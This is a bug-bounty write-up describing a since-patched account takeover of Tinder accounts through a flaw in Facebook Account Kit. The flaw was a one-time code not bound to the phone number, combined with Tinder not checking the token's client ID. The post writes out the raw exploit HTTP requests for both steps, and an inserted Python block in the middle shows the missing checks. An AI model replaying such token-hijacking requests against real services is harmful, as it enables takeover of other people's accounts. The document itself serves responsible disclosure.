How I hacked Tinder accounts using Facebook's Account Kit and earned $6,250 in bounties

by AppSecure

This is being published with the permission of Facebook under the responsible disclosure policy.

The vulnerabilities mentioned in this blog post were plugged quickly by the engineering teams of Facebook and Tinder.

This post is about an account takeover vulnerability I discovered in Tinder's application. By exploiting it, an attacker could have gained access to the Tinder account of any victim who used their phone number to log in.

This could have been exploited through a vulnerability in Facebook’s Account Kit, which Facebook has recently addressed.

Both Tinder’s web and mobile applications allow users to use their mobile phone numbers to log into the service. And this login service is provided by Account Kit (Facebook).

The user clicks on Login with Phone Number on tinder.com and then they are redirected to Accountkit.com for login. If the authentication is successful then Account Kit passes the access token to Tinder for login.

Interestingly, the Tinder API was not checking the client ID on the token provided by Account Kit.

This enabled the attacker to use any other app’s access token provided by Account Kit to take over the real Tinder accounts of other users.

Vulnerability Description

Account Kit is a product of Facebook that lets people quickly register for and log in to some registered apps by using just their phone numbers or email addresses without needing a password. It is reliable, easy to use, and gives the user a choice about how they want to sign up for apps.

Tinder is a location-based mobile app for searching and meeting new people. It allows users to like or dislike other users, and then proceed to a chat if both parties swiped right.

There was a vulnerability in Account Kit through which an attacker could have gained access to any user’s Account Kit account just by using their phone number. Once in, the attacker could have gotten ahold of the user’s Account Kit access token present in their cookies (aks).

After that, the attacker could use the access token (aks) to log into the user’s Tinder account using a vulnerable API.

How my exploit worked step-by-step

Step 1

First, the attacker would log into the victim's Account Kit account by entering the victim's phone number in "new_phone_number" in the API request shown below.

Please note that Account Kit was not verifying the mapping of the phone numbers with their one-time password. The attacker could enter anyone’s phone number and then simply log into the victim’s Account Kit account.

Then the attacker could copy the victim's "aks" access token for the Account Kit app from the cookies.

The vulnerable Account Kit API:

POST /update/async/phone/confirm/?dpr=2 HTTP/1.1
Host: www.accountkit.com

new_phone_number=[victim's phone number]&update_request_code=c1fb2e919bb33a076a7c6fe4a9fbfa97[attacker's request code]&confirmation_code=258822[attacker's code]&__user=0&__a=1&__dyn=&__req=6&__be=-1&__pc=PHASED%3ADEFAULT&__rev=3496767&fb_dtsg=&jazoest=

Step 2

Now the attacker simply replays the following request against the Tinder API below, using the victim's copied "aks" access token.

They will be logged into the victim's Tinder account. The attacker would then have essentially full control over the victim's account: they could read private chats and full personal information, and swipe other users' profiles left or right, among other things.

Vulnerable Tinder API:

POST /v2/auth/login/accountkit?locale=en HTTP/1.1
Host: api.gotinder.com
Connection: close
Content-Length: 185
Origin: https://tinder.com
app-version: 1000000
platform: web
User-Agent: Mozilla/5.0 (Macintosh)
content-type: application/json
Accept: */*
Referer: https://tinder.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"token":"xxx","id":""}
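As an added illustration (not code from Tinder, Facebook or this post), here are the two server-side checks whose absence the write-up describes: for Step 1, binding a one-time code to the phone number it was actually sent to instead of trusting the number in the request body; for Step 2, a relying party verifying that an identity-provider token was issued for its own app before logging the token holder in. The function names, the shape of the token-introspection result, and all IDs and numbers are assumptions constructed for the example.

```python
# Added example: the two checks the post shows were missing. Not Tinder's or
# Account Kit's real code; names, data shapes and values are assumptions.
from dataclasses import dataclass
import hmac

OUR_APP_ID = "app-111"  # constructed: the app ID this service registered with the IdP


# --- Step 1 defect: the OTP must be tied to the phone it was sent to ---
@dataclass
class PendingChange:
    phone: str       # number the one-time code was actually delivered to
    code: str        # constructed one-time code
    account_id: str  # account that requested the change


pending: dict = {}   # update_request_code -> PendingChange (constructed store)


def confirm_phone_change(request_code, submitted_phone, submitted_code):
    """Return the account id whose phone change is confirmed, or None.
    The phone number is taken from the stored request, never from the caller."""
    req = pending.get(request_code)
    if req is None:
        return None
    if not hmac.compare_digest(req.code, submitted_code):
        return None
    # The vulnerable flow trusted new_phone_number from the body; here a
    # number that differs from the one the code was sent to is rejected.
    if submitted_phone != req.phone:
        return None
    del pending[request_code]  # one-time use
    return req.account_id


# --- Step 2 defect: the relying party must check the token's audience ---
def login_with_identity_token(token_info, expected_app_id=OUR_APP_ID):
    """token_info is the assumed result of introspecting the access token at
    the identity provider, e.g. {"id": ..., "application": {"id": ...},
    "phone": {"number": ...}}. Returns the phone number to log in as, or
    None when the token was minted for a different app (the Tinder bug)."""
    app_id = token_info.get("application", {}).get("id")
    if app_id is None or not hmac.compare_digest(app_id, expected_app_id):
        return None
    return token_info.get("phone", {}).get("number")
```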

Video Proof of Concept

Timeline

Both the vulnerabilities were fixed by Tinder and Facebook quickly. Facebook rewarded me with US $5,000, and Tinder awarded me with $1,250.

I’m the founder of AppSecure, a specialized cyber security company with years of skill acquired and meticulous expertise. We are here to safeguard your business and critical data from online and offline threats or vulnerabilities.

You can contact us at anand.prakash@appsecure.in or sales@appsecure.in.

Translated from: https://www.freecodecamp.org/news/hacking-tinder-accounts-using-facebook-accountkit-d5cc813340d1/